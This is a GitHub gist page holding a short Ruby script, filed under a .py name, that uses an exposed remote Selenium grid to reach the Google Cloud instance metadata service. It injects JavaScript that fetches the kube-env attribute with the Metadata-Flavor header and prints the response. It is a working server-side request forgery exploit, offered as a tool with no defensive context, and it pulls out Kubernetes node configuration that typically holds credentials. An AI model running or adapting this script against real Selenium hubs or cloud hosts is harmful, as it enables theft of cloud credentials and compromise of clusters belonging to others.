Skip to content

Instantly share code, notes, and snippets.

@smiegles

smiegles/selenium_google_metadata_ssrf.py

Created January 14, 2021 18:06
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save smiegles/7854b73f9b6c7128e4a82b946f28bf01 to your computer and use it in GitHub Desktop.
Save smiegles/7854b73f9b6c7128e4a82b946f28bf01 to your computer and use it in GitHub Desktop.
Download ZIP
selenium_google_metadata_ssrf.py
Raw
selenium_google_metadata_ssrf.py
require 'selenium-webdriver'
@host = "http://metadata.google.internal/computeMetadata/v1/instance/"
def setup
@driver = Selenium::WebDriver.for(
:remote,
url: 'https://SELENIUM_URL/wd/hub',
desired_capabilities: :chrome)
end
def teardown
@driver.quit
end
def run
setup
yield
teardown
end
def script
return <<-JS
const Http = new XMLHttpRequest();
const url='/computeMetadata/v1/instance/attributes/kube-env';
Http.open("GET", url);
Http.setRequestHeader('Metadata-Flavor', 'Google')
Http.send();
Http.onreadystatechange = (e) => {
document.write(Http.responseText)
};
JS
end
run do
@driver.get @host
@driver.execute_script(script)
puts @driver.page_source
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment